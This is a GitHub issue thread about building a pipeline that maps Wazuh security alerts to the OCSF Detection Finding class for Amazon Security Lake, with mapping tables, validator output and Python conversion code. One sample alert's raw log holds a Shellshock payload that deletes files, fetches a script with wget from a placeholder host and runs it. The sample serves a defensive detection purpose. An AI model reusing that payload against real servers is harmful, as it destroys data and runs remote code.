wazuh / wazuh-indexer

Wazuh indexer, the Wazuh search engine
https://opensearch.org/docs/latest/opensearch/index/
Apache License 2.0

Amazon Security Lake integration - Data transform and delivery (DTD) #145

Closed AlexRuiz7 closed 2 months ago

AlexRuiz7 commented 5 months ago

Description

Now that we know how OCSF works, how to encode data in Parquet and how to implement a Logstash pipeline to send events to an S3 bucket from wazuh-indexer indexes, we need to bundle it all together and prepare the data before sending it to AWS.

As explained in #113, the data must be transformed within the pipeline so that it reaches the Amazon Security Lake S3 bucket already in OCSF format and encoded as Parquet.

To transform the data, we'll explore two approaches: a Lambda function and a Python script. The main difference between them is the resources required, as the first one needs an auxiliary S3 bucket.

Tasks

Subtasks

Definition of done

These two proposals will be worked on in parallel. As soon as we get one of them working, we can consider this issue completed. Once that happens, we'll discuss the next steps.

kclinden commented 5 months ago

Has sending the data to a Kinesis Firehose with data transformation to parquet been considered? https://docs.aws.amazon.com/firehose/latest/dev/record-format-conversion.html

AlexRuiz7 commented 4 months ago

Together with the @wazuh/threat-intel team, we have worked on generating mappings to transform our data to the OCSF schema. To do that, we'll use the Detection Finding (2004) class, added in the v1.1.0 release of OCSF. The first proposal was to use the Security Finding (2001) class, but it was discarded because it is deprecated in the latest version of OCSF.

OCSF Version: 1.1.0

| OCSF | Value |
|---|---|
| category_uid | 2 |
| category_name | Findings |
| class_uid | 2004 |
| class_name | Detection Finding |
| type_uid | 200401 |
| metadata.product.name | Wazuh |
| metadata.product.vendor_name | Wazuh, Inc,. |
| metadata.product.version | 4.9.0 |
| metadata.product.lang | en |
| metadata.log_name | Security events |
| metadata.log_provider | Wazuh |

| OCSF (2004) | Wazuh event field |
|---|---|
| activity_id | 1 |
| time | timestamp |
| message | rule.description |
| count | rule.firedtimes |
| finding_info.uid | id |
| finding_info.title | rule.description |
| finding_info.types | input.type |
| finding_info.analytic.category | rule.groups |
| finding_info.analytic.name | decoder.name |
| finding_info.analytic.type | Rule |
| finding_info.analytic.type_id | 1 |
| finding_info.analytic.uid | rule.id |
| risk_score | rule.level |
| finding_info.attacks.tactic.name | rule.mitre.tactic |
| finding_info.attacks.technique.name | rule.mitre.technique |
| finding_info.attacks.technique.uid | rule.mitre.id |
| finding_info.attacks.version | v13.1 |
| unmapped | rule.nist_800_53 |
| severity_id | convert(rule.level) |
| status_id | 99 |
| resources.name | agent.name |
| resources.uid | agent.id |
| unmapped | ['_index', 'location', 'manager.name'] |
| raw_data | full_log |

Originally posted by @IsExec in https://github.com/wazuh/internal-devel-requests/issues/699#issuecomment-1933401673
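The `convert(rule.level)` entry for `severity_id` is left unspecified in the mapping. As a minimal sketch only, the conversion could bucket Wazuh rule levels (0 to 15) into the OCSF `severity_id` values 1 (Informational) through 6 (Fatal), with 0 (Unknown) for out-of-range input. The function name `level_to_severity_id` and the band boundaries below are assumptions made for illustration, not an agreed mapping.

```python
import bisect

# Hypothetical inclusive upper bound of each Wazuh level band, ascending.
# The thresholds are an assumption; adjust them to the agreed mapping.
_LEVEL_UPPER_BOUNDS = [3, 6, 9, 12, 14, 15]
# OCSF severity_id per band: 1 Informational, 2 Low, 3 Medium,
# 4 High, 5 Critical, 6 Fatal.
_SEVERITY_IDS = [1, 2, 3, 4, 5, 6]


def level_to_severity_id(level: int) -> int:
    """Map a Wazuh rule level (0-15) to an OCSF severity_id.

    Returns 0 (Unknown) when the level is outside the 0-15 range.
    """
    if not 0 <= level <= 15:
        return 0
    band = bisect.bisect_left(_LEVEL_UPPER_BOUNDS, level)
    return _SEVERITY_IDS[band]


if __name__ == "__main__":
    for sample_level in (0, 6, 10, 15, 16):
        print(sample_level, level_to_severity_id(sample_level))
```

Keeping the bounds in a single list makes the thresholds easy to revise once the final mapping is decided.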

To verify that these mappings produce OCSF-compliant data, we used the validate tool from amazon-security-lake-ocsf-validation, which had to be updated (link redirects to the updated version), together with the CLI Python module parquet-tools.

parquet-tools show parquet/wazuh-event.ocsf.parquet
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
|   activity_id | category_name   |   category_uid | class_name        |   class_uid |   count | message                   | finding_info                                                                                                                                                                                                                                                                                                                                                                                                                           | metadata                                                                                                                                                | raw_data                                                                                                                                                                                                                | resources                                |   risk_score |   severity_id |   status_id | time                         |   type_uid | unmapped                                                                            |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
|             1 | Findings        |              2 | Detection Finding |        2004 |       1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] |            6 |             6 |          99 | 2024-02-08T11:35:14.334-0300 |     200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
|               |                 |                |                   |             |         |                           |                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                                                                                                                                         |                                                                                                                                                                                                                         |                                          |              |               |             |                              |            |        'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)}       |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
python validate.py -i ../../wazuh-indexer/integrations/amazon-security-lake/parquet/output -version ocsf_schema_1.1.0
Attempting to Validate File: wazuh-event.ocsf.parquet...

Validating Against Event Class: detection_finding (2004)...

VALID OCSF.
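
Independently of the validator, a cheap sanity check can be run on the classification fields before encoding. OCSF derives `type_uid` as `class_uid * 100 + activity_id`, which gives 200401 for Detection Finding (2004) with `activity_id` 1. The helper names below are hypothetical and the sketch covers only this one relationship, not full schema validation.

```python
def expected_type_uid(class_uid: int, activity_id: int) -> int:
    """Return the type_uid that OCSF derives from class and activity."""
    return class_uid * 100 + activity_id


def check_type_uid(record: dict) -> list:
    """Return a list of problems found in the record's type_uid (empty if none)."""
    problems = []
    expected = expected_type_uid(record["class_uid"], record["activity_id"])
    if record["type_uid"] != expected:
        problems.append(
            f"type_uid is {record['type_uid']}, expected {expected}"
        )
    return problems


if __name__ == "__main__":
    # Values taken from the record shown by parquet-tools above.
    record = {"class_uid": 2004, "activity_id": 1, "type_uid": 200401}
    print(check_type_uid(record))
```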
Python mappings to OCSF

```python
#!/usr/bin/python

# event comes from Filebeat
event = {}


def normalize(level: int) -> int:
    """
    Normalizes rule level into the 0-6 range, required by OCSF.
    """
    # TODO normalization
    return level


def join(iterable, separator=","):
    return (separator.join(iterable))


def convert(event: dict) -> dict:
    """
    Converts Wazuh events to OCSF's Detection Finding (2004) class.
    """
    ocsf_class_template = \
        {
            "activity_id": 1,
            "category_name": "Findings",
            "category_uid": 2,
            "class_name": "Detection Finding",
            "class_uid": 2004,
            "count": event["_source"]["rule"]["firedtimes"],
            "message": event["_source"]["rule"]["description"],
            "finding_info": {
                "analytic": {
                    "category": join(event["_source"]["rule"]["groups"]),
                    "name": event["_source"]["decoder"]["name"],
                    "type_id": 1,
                    "uid": event["_source"]["rule"]["id"],
                },
                "attacks": {
                    "tactic": {
                        "name": join(event["_source"]["rule"]["mitre"]["tactic"]),
                    },
                    "technique": {
                        "name": join(event["_source"]["rule"]["mitre"]["technique"]),
                        "uid": join(event["_source"]["rule"]["mitre"]["id"]),
                    },
                    "version": "v13.1"
                },
                "title": event["_source"]["rule"]["description"],
                "types": [
                    event["_source"]["input"]["type"]
                ],
                "uid": event["_source"]['id']
            },
            "metadata": {
                "log_name": "Security events",
                "log_provider": "Wazuh",
                "product": {
                    "name": "Wazuh",
                    "lang": "en",
                    "vendor_name": "Wazuh, Inc,."
                },
                "version": "1.1.0",
            },
            "raw_data": event["_source"]["full_log"],
            "resources": [
                {
                    "name": event["_source"]["agent"]["name"],
                    "uid": event["_source"]["agent"]["id"]
                },
            ],
            "risk_score": event["_source"]["rule"]["level"],
            "severity_id": normalize(event["_source"]["rule"]["level"]),
            "status_id": 99,
            "time": event["_source"]["timestamp"],
            "type_uid": 200401,
            "unmapped": {
                "data_sources": [
                    event["_index"],
                    event["_source"]["location"],
                    event["_source"]["manager"]["name"]
                ],
                "nist": event["_source"]["rule"]["nist_800_53"],  # Array
            }
        }

    return ocsf_class_template
```
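
The mapping code indexes every field directly, so it raises `KeyError` if an event lacks one of them. Assuming some events arrive without optional fields such as `rule.mitre` or `rule.nist_800_53`, a small lookup helper with a default could absorb the gaps. `get_nested` is a hypothetical helper introduced here for illustration; it is not part of the script above.

```python
def get_nested(data: dict, dotted_path: str, default=None):
    """Walk a dict along a dot-separated path, returning default on any miss."""
    current = data
    for key in dotted_path.split("."):
        if not isinstance(current, dict) or key not in current:
            return default
        current = current[key]
    return current


if __name__ == "__main__":
    # A trimmed event body with no MITRE information (assumed shape).
    source = {
        "rule": {
            "description": "Shellshock attack attempt",
            "groups": ["web", "accesslog", "attack"],
        }
    }
    tactics = get_nested(source, "rule.mitre.tactic", default=[])
    groups = get_nested(source, "rule.groups", default=[])
    print(",".join(tactics))  # empty string, since rule.mitre is absent
    print(",".join(groups))
```

Defaulting list fields to `[]` keeps the existing `join` calls working unchanged, at the cost of emitting empty strings for absent values.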

AlexRuiz7 commented 4 months ago

I'm working on an event generator tool to test the integration and ease its development.
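
As a rough illustration of the idea, and not the tool itself, a generator could emit events with the `_index` / `_source` shape consumed by the mapping script. The rule values below are copied from the Shellshock sample shown earlier in this thread; the function name, index name, agent name, manager name and log line are placeholders assumed for the sketch.

```python
import random
from datetime import datetime, timezone

# Rule fields taken from the sample event in this thread.
SAMPLE_RULE = {
    "id": "31166",
    "level": 6,
    "description": "Shellshock attack attempt",
    "groups": ["web", "accesslog", "attack"],
    "mitre": {
        "tactic": ["Privilege Escalation", "Initial Access"],
        "technique": [
            "Exploitation for Privilege Escalation",
            "Exploit Public-Facing Application",
        ],
        "id": ["T1068", "T1190"],
    },
    "nist_800_53": ["SI.4"],
}


def generate_event(rng: random.Random,
                   index: str = "wazuh-alerts-4.x-sample") -> dict:
    """Build one synthetic event; all non-rule values are placeholders."""
    now = datetime.now(timezone.utc)
    millis = now.microsecond // 1000
    rule = dict(SAMPLE_RULE, firedtimes=rng.randint(1, 10))
    return {
        "_index": index,
        "_source": {
            "id": f"{now.timestamp():.6f}",
            "timestamp": now.strftime("%Y-%m-%dT%H:%M:%S") + f".{millis:03d}+0000",
            "agent": {"id": f"{rng.randint(0, 999):03d}", "name": "sample-agent"},
            "manager": {"name": "sample-manager"},
            "decoder": {"name": "web-accesslog"},
            "input": {"type": "log"},
            "location": "/var/log/nginx/access.log",
            "full_log": "placeholder log line",
            "rule": rule,
        },
    }


if __name__ == "__main__":
    rng = random.Random(42)  # seeded so runs are repeatable
    for _ in range(3):
        print(generate_event(rng))
```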